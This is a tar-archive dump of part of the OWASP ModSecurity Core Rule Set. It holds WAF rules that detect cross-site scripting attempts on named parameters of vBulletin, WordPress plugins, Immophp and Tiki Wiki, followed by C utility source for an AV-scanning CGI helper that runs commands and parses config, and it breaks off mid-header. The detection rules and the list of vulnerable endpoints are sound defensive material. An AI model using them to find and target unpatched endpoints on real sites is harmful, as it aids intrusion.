"ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS vBulletin vBTube vidid Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013134) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS vBulletin vBTube uname Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /vBTube.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013134,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS vBulletin vBTube uname Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:uname/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS vBulletin vBTube uname Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013226) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Immophp secteur parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /annonce.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013226,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Immophp secteur parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,48341'" SecRule &TX:'/XSS.*ARGS:secteur/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Immophp secteur parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013310) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin title parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/php_speedy_wp/libs/php_speedy/view/admin_container.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013310,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin title parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:title/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin title parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013425) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress eShop plugin eshoptemplate parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains page=eshop-templates.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013425,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress eShop plugin eshoptemplate parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:eshoptemplate/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress eShop plugin eshoptemplate parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013426) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress eShop plugin action parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains page=eshop-orders.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013426,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress eShop plugin action parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:action/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress eShop plugin action parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013427) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress eShop plugin viewemail parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains page=eshop-orders.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013427,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress eShop plugin viewemail parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:viewemail/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress eShop plugin viewemail parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013434) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Tiki Wiki CMS ajax parameter XSS Vulnerability SecRule REQUEST_LINE "@contains /snarf_ajax.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013434,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Tiki Wiki CMS ajax parameter XSS Vulnerability',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:ajax/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Tiki Wiki CMS ajax parameter XSS Vulnerability',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" SecMarker END_SLR_ET_XSS_RULES ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/������������������������������������������������������0000775�0000000�0000000�00000000000�12164572564�0021501�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/README������������������������������������������������0000664�0000000�0000000�00000000161�12164572564�0022357�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������The util directory contains many supporting tools/scripts that may be used with the OWASP ModSecurity CRS files. ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/av-scanning/������������������������������������������0000775�0000000�0000000�00000000000�12164572564�0023705�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/av-scanning/runAV/������������������������������������0000775�0000000�0000000�00000000000�12164572564�0024740�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/av-scanning/runAV/common.c����������������������������0000775�0000000�0000000�00000043617�12164572564�0026412�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include "common.h" int lock_file(char *filename) { int fd; if (!filename) return -1; if ((fd = open(filename,O_RDONLY | O_CREAT , S_IRWXU)) < 0) { print_error("lock_file","open",modsec_rpc_log_file,errno); return -1; } flock(fd,LOCK_EX); return fd; } int unlock_file(int fd) { flock(fd,LOCK_UN); return 0; } int print_request(char* url,char *command,parameter_t *parameters, int num_of_parameters, int mask) { char time_str[64], line[1024*1024]; time_t t; int fd; int i; switch (atoi(modsec_rpc_log_level)) { case DEBUG: time(&t); ctime_r(&t,time_str); time_str[strlen(time_str)-1] = '\0'; if ((fd = open(modsec_rpc_log_file,O_WRONLY | O_CREAT | O_APPEND | O_SYNC , S_IRWXU)) < 0) { print_error("print_request","open",modsec_rpc_log_file,errno); fd=2; } flock(fd,LOCK_EX); sprintf(line,"%s:REQUEST-BEGIN:======================================\n",time_str); line[1024*1024-1]='\0'; write(fd,line,strlen(line)); snprintf(line,1024*1024,"URL:%s\nCommand:%s\n",url,command); line[1024*1024-1]='\0'; write(fd,line,strlen(line)); for (i=0; i<num_of_parameters; i++) { snprintf(line,1024*1024,"%s=",parameters[i].name); line[1024*1024-1]='\0'; write(fd,line,strlen(line)); if (i == mask) { sprintf(line,"XXXXXXX\n"); write(fd,line,strlen(line)); } else { if (parameters[i].value) { snprintf(line,1024*1024,"%s\n",parameters[i].value); line[1024*1024-1]='\0'; } else sprintf(line,"\n"); write(fd,line,strlen(line)); } } sprintf(line,"%s:REQUEST-END:========================================\n",time_str); write(fd,line,strlen(line)); flock(fd,LOCK_UN); if (fd!=2) close(fd); break; } return 0; } int print_request_force(char* url,char *command,parameter_t *parameters, int num_of_parameters, int mask) { char real_level[1024]; strcpy(real_level,modsec_rpc_log_level); strcpy(modsec_rpc_log_level,"1"); print_request(url,command,parameters,num_of_parameters,mask); strcpy(modsec_rpc_log_level,real_level); return 0; } int print_reply(char *reply) { char time_str[64]; time_t t; int fd; printf("%s",reply); switch (atoi(modsec_rpc_log_level)) { case DEBUG: time(&t); ctime_r(&t,time_str); time_str[strlen(time_str)-1] = '\0'; if ((fd = open(modsec_rpc_log_file,O_WRONLY | O_CREAT | O_APPEND | O_SYNC , S_IRWXU)) < 0) { print_error("print_request","open",modsec_rpc_log_file,errno); fd=2; } flock(fd,LOCK_EX); write(fd,reply,strlen(reply)); flock(fd,LOCK_UN); if (fd!=2) close(fd); break; } return 0; } int print_error(char *func1, char* func2, char* str, int err) { char out[1024], time_str[64], line[1024*1024]; char str1[1024], str2[1024], str3[1024]; time_t t; int fd; time(&t); ctime_r(&t,time_str); time_str[strlen(time_str)-1] = '\0'; if (err) strcpy(out,strerror(err)); else strcpy(out,""); if (!func1) strcpy(str1,""); else { strncpy(str1,func1,1024); str1[1023]='\0'; } if (!func2) strcpy(str2,""); else { strncpy(str2,func2,1024); str2[1023]='\0'; } if (!str) strcpy(str3,""); else { strncpy(str3,str,1024); str3[1023]='\0'; } if ((fd = open(modsec_rpc_log_file,O_WRONLY | O_CREAT | O_APPEND | O_SYNC , S_IRWXU)) < 0) { fprintf(stderr,"%s:ERROR:print_error:open:%s:%s\n",time_str,strerror(errno),modsec_rpc_log_file); fd=2; } snprintf(line,1024*1024,"%s:ERROR:%s:%s:%s:%s\n",time_str,str1,str2,out,str3); line[1024*1024-1]='\0'; flock(fd,LOCK_EX); write(fd,line,strlen(line)); flock(fd,LOCK_UN); if (fd!=2) close(fd); return 0; } int is_proxy_up() { int pid; FILE *fp; if ((fp = fopen(modsec_proxy_pid,"r")) == NULL ) return 0; if (fscanf(fp,"%d",&pid) == 0) { print_error("is_proxy_up","fscanf","missing PID",0); fclose(fp); return 0; } fclose(fp); if (!pid || kill(pid,0)) return 0; return 1; } int run_cmd(char *command, char *output, int output_size) { char line[1024]; FILE *fp; if (output_size > 0 && output) output[0]='\0'; if (!(fp=popen(command,"r"))) { print_error("run_cmd","popen",command,errno); return -1; } while (output_size && fgets(line,output_size>1024?1024:output_size,fp)) { strcat(output, line); output_size -= strlen(line); } if (!output_size) while (fgets(line,1024,fp)); pclose(fp); return 0; } int find_param_idx(char *parameter_name, parameter_t *parameters, int max_parameters) { int i, idx=-1; for (i = 0; (i < max_parameters) && (idx < 0); i++) if ( strstr(parameters[i].name,parameter_name) ) idx=i; return idx; } int parse_file(char *filename, parameter_t *parameters, int max_parameters) { char line[1024], *ptr; int i; FILE *fp; if (!max_parameters || (parameters == NULL) || (filename == NULL)) { print_error("parse_file","invalid input parameters","none",0); return 0; } if ((fp = fopen(filename,"r")) == NULL ) { print_error("parse_file","fopen",filename,errno); return 0; } i=0; while ( i < max_parameters && fgets(line,1024,fp)) { if (ptr = strstr(line,"#")) *ptr='\0'; if (sscanf(line,"%[^=]=%s",parameters[i].name,parameters[i].value) != 2) continue; i++; } fclose(fp); return i; } int change_file(char *filename, parameter_t parameter) { char line[1024], *name, *value; int i, found=0; FILE *fp; if (filename == NULL) return 0; if ((fp = fopen(filename,"r+")) == NULL ) return 0; i=0; while ( fgets(line,1024,fp)) { sscanf(line,"%[^=]=%s",name,value); if (name && !strcmp(name,parameter.name)) { fprintf(fp,"%s=%s\n",name,parameter.value); found=1; continue; } else fprintf(fp,"%s",line); } fclose(fp); return found; } int copy_file(char *src_file, char *dst_file) { char line[1024]; FILE *sfp, *dfp; if (src_file == NULL || dst_file == NULL) return 0; if ((sfp = fopen(src_file,"r")) == NULL ) return 0; if ((dfp = fopen(dst_file,"w")) == NULL ) { fclose(sfp); return 0; } while ( fgets(line,1024,sfp)) fprintf(dfp,"%s",line); fclose(sfp); fclose(dfp); return 1; } int parse_query(char *query, parameter_t *parameters, int max_parameters) { char *ptr, *dst_ptr, num[3]; int i, len; if (!max_parameters || (parameters == NULL) || (query == NULL)) return 0; ptr=query; i=0; while ((i < max_parameters) && *ptr) { parameters[i].name[0] = '\0'; dst_ptr = parameters[i].name; len=0; while (*ptr && (*ptr != '=') && (len++ < MAX_NAME_LENGTH)) { if (*ptr == '%' && *(ptr+1) && *(ptr+2)) { num[0]=*(ptr+1); num[1]=*(ptr+2); num[2]='\0'; ptr += 3; *dst_ptr=(char)strtol(num,NULL,16); if (*dst_ptr) dst_ptr++; } else *dst_ptr++ = *ptr++; } if (len >= MAX_NAME_LENGTH) while (*ptr && (*ptr != '=')) *ptr++; if (*ptr) ptr++; *dst_ptr = '\0'; parameters[i].value[0] = '\0'; dst_ptr = parameters[i].value; len=0; while (*ptr && (*ptr != '&') && (len++ < MAX_VALUE_LENGTH)) { if (*ptr == '%' && *(ptr+1) && *(ptr+2)) { num[0]=*(ptr+1); num[1]=*(ptr+2); num[2]='\0'; ptr += 3; *dst_ptr=(char)strtol(num,NULL,16); if (*dst_ptr) dst_ptr++; } else *dst_ptr++ = *ptr++; } if (len >= MAX_VALUE_LENGTH) while (*ptr && (*ptr != '&')) *ptr++; if (*ptr) ptr++; *dst_ptr = '\0'; i++; } return i; } int parse_query_and_body (parameter_t *parameters, int max_parameters) { char *query, *content_length_env; int i, num_of_params, body_len, content_length; query = getenv("QUERY_STRING"); if (query && *query) return(parse_query(query,parameters,max_parameters)); else { content_length_env = getenv("CONTENT_LENGTH"); if (!content_length_env) return 0; if (! *content_length_env) return 0; content_length=atol(content_length_env); if (!(query=malloc(content_length+1))) return 0; i = 1; body_len=0; while ( (body_len < content_length) && (i>0) ) { i = read(0,query+body_len,(content_length-body_len)<1024?(content_length-body_len):1024); if (i > 0 ) body_len+=i; } query[body_len] = '\0'; num_of_params = parse_query(query,parameters,max_parameters); free(query); return num_of_params; } } int parse_cli (parameter_t *parameters, int max_parameters, int num_of_args, char *args[]) { char name[MAX_NAME_LENGTH], value[MAX_VALUE_LENGTH]; int i, num_of_params=0; if (num_of_args > 0) for (i=0; i<num_of_args && i<max_parameters; i++) { if (sscanf(args[i],"%[^=]=%s",name,value) < 2) continue; if (strlen(name) < MAX_NAME_LENGTH) strcpy(parameters[num_of_params].name,name); else continue; if (strlen(value) < MAX_VALUE_LENGTH) { strcpy(parameters[num_of_params].value,value); num_of_params++; } } return num_of_params; } int send_request(char *request,char *ip,char *port,char *reply,int max_reply_size) { int sock, i, reply_len; struct sockaddr_in servaddr; reply[0]='\0'; reply_len=0; if (!request || !*request || !ip || !port || !reply || !max_reply_size) return -1; memset(&servaddr, 0, sizeof(servaddr)); servaddr.sin_family = AF_INET; servaddr.sin_port = htons((short)atol(port)); if ( inet_aton(ip, &servaddr.sin_addr) <= 0 ) return -1; if ( (sock = socket(AF_INET, SOCK_STREAM, 0)) < 0 ) { print_error("send_request","socket",ip,errno); return -1; } if ( connect(sock, (struct sockaddr *) &servaddr, sizeof(servaddr) ) < 0 ) { print_error("send_request","connect",ip,errno); close(sock); return -1; } i = strlen(request); if ( write(sock,request,i) < i ) { print_error("send_request","write",ip,errno); shutdown(sock,SHUT_RDWR); close(sock); return -1; } i = 1; reply_len=0; while ( (reply_len < max_reply_size) && (i>0) ) { i = read(sock,reply+reply_len,(max_reply_size-reply_len)<1024?(max_reply_size-reply_len):1024); if (i > 0 ) reply_len+=i; } reply[reply_len] = '\0'; shutdown(sock,SHUT_RDWR); close(sock); return reply_len; } int find_ip_idx(char *ip, blocklist_t *blocklist, int num_of_ips) { int i, idx=-1; for (i = 0; (i < num_of_ips) && (idx < 0); i++) if ( strstr(blocklist[i].ip,ip) ) idx=i; return idx; } int remove_ip_idx(char *ip, blocklist_t *blocklist, int num_of_ips) { int i, j, idx=-1; time_t t; time(&t); for (i = 0; i < num_of_ips; i++) if ( (ip && strstr(blocklist[i].ip,ip)) || (!ip && (t > blocklist[i].end)) ) { idx=i; for (j=i; j<(num_of_ips-1); j++) { strcpy(blocklist[j].ip,blocklist[j+1].ip); blocklist[j].start = blocklist[j+1].start; blocklist[j].duration = blocklist[j+1].duration; blocklist[j].end = blocklist[j+1].end; strcpy(blocklist[j].token,blocklist[j+1].token); } num_of_ips--; } return idx; } int read_conf_file (char *filename) { int idx, num_of_params; parameter_t parameters[MAX_PARAMS]; num_of_params=parse_file(filename,parameters,MAX_PARAMS); if ((idx = find_param_idx("MODSEC_CLI_HOME",parameters,num_of_params)) >= 0) strcpy(modsec_cli_home,parameters[idx].value); if ((idx = find_param_idx("MODSEC_RPC_HOME",parameters,num_of_params)) >= 0) strcpy(modsec_rpc_home,parameters[idx].value); if ((idx = find_param_idx("MODSEC_RPC_LOG_FILE",parameters,num_of_params)) >= 0) strcpy(modsec_rpc_log_file,parameters[idx].value); if ((idx = find_param_idx("MODSEC_RPC_LOG_LEVEL",parameters,num_of_params)) >= 0) strcpy(modsec_rpc_log_level,parameters[idx].value); if ((idx = find_param_idx("MODSEC_RPC_SSL_LOCKFILE",parameters,num_of_params)) >= 0) strcpy(modsec_rpc_ssl_lockfile,parameters[idx].value); if ((idx = find_param_idx("MODSEC_RPC_SENSOR_LOCKFILE",parameters,num_of_params)) >= 0) strcpy(modsec_rpc_sensor_lockfile,parameters[idx].value); if ((idx = find_param_idx("MODSEC_RPC_REVERSEPROXY_LOCKFILE",parameters,num_of_params)) >= 0) strcpy(modsec_rpc_reverseproxy_lockfile,parameters[idx].value); if ((idx = find_param_idx("MODSEC_RPC_EXTERNALNIC_LOCKFILE",parameters,num_of_params)) >= 0) strcpy(modsec_rpc_externalnic_lockfile,parameters[idx].value); if ((idx = find_param_idx("MODSEC_RPC_MUI_LOCKFILE",parameters,num_of_params)) >= 0) strcpy(modsec_rpc_mui_lockfile,parameters[idx].value); if ((idx = find_param_idx("MODSEC_RPC_LOG_LEVEL",parameters,num_of_params)) >= 0) strcpy(modsec_rpc_log_level,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_HOME",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_home,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_IP",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_ip,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_PORT",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_port,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_NETWORK_PREFIX",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_network_prefix,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_BIN",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_bin,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_CONF",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_conf,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_EXT_NIC",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_ext_nic,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_PID",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_pid,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_WHITELIST",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_whitelist,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_BLACKLIST",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_blacklist,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_TIMEOUT",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_timeout,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_EXCHANGE",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_exchange,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_EXT_IPS",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_ext_ips,parameters[idx].value); if ((idx = find_param_idx("MODSEC_MUI_UI_ADMIN",parameters,num_of_params)) >= 0) strcpy(modsec_mui_ui_admin,parameters[idx].value); if ((idx = find_param_idx("MODSEC_RPC_PASSWORD_FILE",parameters,num_of_params)) >= 0) strcpy(modsec_rpc_password_file,parameters[idx].value); if ((idx = find_param_idx("MODSEC_MUI_UI_IPADDRESS",parameters,num_of_params)) >= 0) strcpy(modsec_mui_ui_ipaddress,parameters[idx].value); if ((idx = find_param_idx("MODSEC_MUI_UI_PORT",parameters,num_of_params)) >= 0) strcpy(modsec_mui_ui_port,parameters[idx].value); if ((idx = find_param_idx("SENSOR_ID",parameters,num_of_params)) >= 0) strcpy(sensor_id,parameters[idx].value); if ((idx = find_param_idx("SERIAL",parameters,num_of_params)) >= 0) strcpy(serial,parameters[idx].value); if ((idx = find_param_idx("VERSION_NUMBER",parameters,num_of_params)) >= 0) strcpy(version_number,parameters[idx].value); if ((idx = find_param_idx("RELEASE_DATE",parameters,num_of_params)) >= 0) strcpy(release_date,parameters[idx].value); if ((idx = find_param_idx("BRIDGE_MODE",parameters,num_of_params)) >= 0) strcpy(bridge_mode,parameters[idx].value); if ((idx = find_param_idx("DATA_DISK_SPACE",parameters,num_of_params)) >= 0) strcpy(data_disk_space,parameters[idx].value); if ((idx = find_param_idx("CONN_RATE",parameters,num_of_params)) >= 0) strcpy(conn_rate,parameters[idx].value); if ((idx = find_param_idx("CONN_RATE_PER_ADDR",parameters,num_of_params)) >= 0) strcpy(conn_rate_per_addr,parameters[idx].value); if ((idx = find_param_idx("CONNS",parameters,num_of_params)) >= 0) strcpy(conns,parameters[idx].value); if ((idx = find_param_idx("CONNS_PER_ADDR",parameters,num_of_params)) >= 0) strcpy(conns_per_addr,parameters[idx].value); if ((idx = find_param_idx("MODSEC_RPC",parameters,num_of_params)) >= 0) strcpy(modsec_rpc,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY",parameters,num_of_params)) >= 0) strcpy(modsec_proxy,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_SCRIPT",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_script,parameters[idx].value); return num_of_params; } int init_cgi() { char *modsec; setresuid(0,0,0); setresgid(0,0,0); strcpy(modsec_cli_home,"/opt/modsecurity-cli"); strcpy(modsec_rpc_home,"/opt/modsecurity-rpc"); strcpy(modsec_rpc_log_file,"/opt/modsecurity-rpc/var/logs/rpc.log"); strcpy(modsec_rpc_log_level,"0"); strcpy(modsec_rpc_ssl_lockfile,"/opt/modsecurity-rpc/var/run/ssl.lock"); strcpy(modsec_rpc_sensor_lockfile,"/opt/modsecurity-rpc/var/run/sensor.lock"); strcpy(modsec_rpc_externalnic_lockfile,"/opt/modsecurity-rpc/var/run/externalnic.lock"); strcpy(modsec_rpc_reverseproxy_lockfile,"/opt/modsecurity-rpc/var/run/reverseproxy.lock"); strcpy(modsec_rpc_mui_lockfile,"/opt/modsecurity-rpc/var/run/mui.lock"); strcpy(modsec_proxy_home,"/opt/modsecurity-proxy"); strcpy(modsec_proxy_ip,"127.0.0.2"); strcpy(modsec_proxy_port,"80"); strcpy(modsec_proxy_bin,"/bin/modsec-proxyd"); strcpy(modsec_proxy_script,"/etc/init.d/modsec-proxy"); strcpy(modsec_proxy_conf,"/etc/httpd.conf"); strcpy(modsec_proxy_ext_nic,"eth0"); strcpy(modsec_proxy_network_prefix,"172.16.0.0/12"); strcpy(modsec_proxy_pid,"/opt/modsecurity-proxy/var/run/httpd.pid"); strcpy(modsec_proxy_whitelist,"/opt/breach/etc/modsec_whitelist.conf"); strcpy(modsec_proxy_blacklist,"/opt/breach/etc/modsec_blacklist.conf"); strcpy(modsec_proxy_timeout,"120"); strcpy(modsec_proxy_exchange,"/opt/modsecurity-proxy/var/exchange"); strcpy(modsec_proxy_ext_ips,"/opt/breach/etc/modsec_ips.conf"); strcpy(modsec_mui_ui_ipaddress,"127.0.0.1"); strcpy(modsec_mui_ui_port,"443"); strcpy(modsec_rpc_password_file,"/opt/modsecurity-rpc/etc/.htpasswd"); strcpy(modsec_mui_ui_admin,"admin"); strcpy(sensor_id,"1"); strcpy(serial,"1"); strcpy(version_number,"2.0"); strcpy(bridge_mode,"off"); strcpy(data_disk_space,"60"); strcpy(release_date,"11-15-2006"); strcpy(conn_rate,"0"); strcpy(conn_rate_per_addr,"0"); strcpy(conns,"0"); strcpy(conns_per_addr,"0"); if (modsec = getenv("MODSEC")) read_conf_file(modsec); else { if (!read_conf_file("/opt/breach/etc/modsec.conf")) read_conf_file("/etc/modsec.conf"); } return 0; } �����������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/av-scanning/runAV/common.h����������������������������0000775�0000000�0000000�00000006765�12164572564�0026422�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <stdio.h> #include <stdlib.h> #include <errno.h> #include <string.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/stat.h> #include <arpa/inet.h> #include <unistd.h> #include <dirent.h> #include <time.h> #include <fcntl.h> #include <crypt.h> #define MAX_PARAMS 256 #define MAX_IPS 256 #define MAX_NAME_LENGTH 256 #define MAX_VALUE_LENGTH 1024 #define MAX_CMD_LENGTH 1024 #define MAX_TOKEN_LENGTH 1024 #define MAX_OUTPUT_LINE_LEN (1024) #define MAX_OUTPUT_SIZE (MAX_OUTPUT_LINE_LEN*1024) #define WHITE 1 #define BLACK 0 #define NONE 0 #define DEBUG 1 typedef struct { char name[MAX_NAME_LENGTH]; char value[MAX_VALUE_LENGTH]; } parameter_t; typedef struct { char ip[16]; time_t start; long duration; time_t end; char token[MAX_TOKEN_LENGTH]; } blocklist_t; EXTERN int lock_file(char *filename); EXTERN int unlock_file(int fd); EXTERN int print_reply(char *reply); EXTERN int print_error(char *func1, char* func2, char* str, int err); EXTERN int print_request(char* url,char *command,parameter_t *parameters, int num_of_parameters, int mask); EXTERN int print_request_force(char* url,char *command,parameter_t *parameters, int num_of_parameters, int mask); EXTERN int is_proxy_up(); EXTERN int run_cmd(char *command, char *output, int output_size); EXTERN int parse_cli (parameter_t *parameters, int max_parameters, int num_of_args, char *args[]); EXTERN int parse_query_and_body(parameter_t *parameters, int max_parameters); EXTERN int parse_query(char *query, parameter_t *parameters, int max_parameters); EXTERN int parse_file(char *filename, parameter_t *parameters, int max_parameters); EXTERN int copy_file(char *src_file, char *dst_file); EXTERN int change_file(char *filename, parameter_t parameter); EXTERN int find_param_idx(char *parameter_name, parameter_t *parameters, int max_parameters); EXTERN int init_cgi(); EXTERN int send_request(char *request,char *ip,char *port,char *reply,int max_reply_size); EXTERN int find_ip_idx(char *ip, blocklist_t *blocklist, int num_of_ips); EXTERN int remove_ip_idx(char *ip, blocklist_t *blocklist, int num_of_ips); EXTERN char modsec_rpc[1024]; EXTERN char modsec_rpc_home[1024]; EXTERN char modsec_rpc_log_file[1024]; EXTERN char modsec_rpc_log_level[1024]; EXTERN char modsec_rpc_ssl_lockfile[1024]; EXTERN char modsec_rpc_externalnic_lockfile[1024]; EXTERN char modsec_rpc_sensor_lockfile[1024]; EXTERN char modsec_rpc_reverseproxy_lockfile[1024]; EXTERN char modsec_rpc_mui_lockfile[1024]; EXTERN char modsec_proxy[1024]; EXTERN char modsec_proxy_home[1024]; EXTERN char modsec_proxy_script[1024]; EXTERN char modsec_proxy_ip[1024]; EXTERN char modsec_proxy_port[1024]; EXTERN char modsec_proxy_bin[1024]; EXTERN char modsec_proxy_conf[1024]; EXTERN char modsec_proxy_ext_nic[1024]; EXTERN char modsec_proxy_pid[1024]; EXTERN char modsec_proxy_whitelist[1024]; EXTERN char modsec_proxy_blacklist[1024]; EXTERN char modsec_proxy_network_prefix[1024]; EXTERN char modsec_proxy_timeout[1024]; EXTERN char modsec_proxy_exchange[1024]; EXTERN char modsec_proxy_ext_ips[1024]; EXTERN char modsec_rpc_password_file[1024]; EXTERN char modsec_mui_ui_admin[1024]; EXTERN char modsec_mui_ui_ipaddress[1024]; EXTERN char modsec_mui_ui_port[1024]; EXTERN char 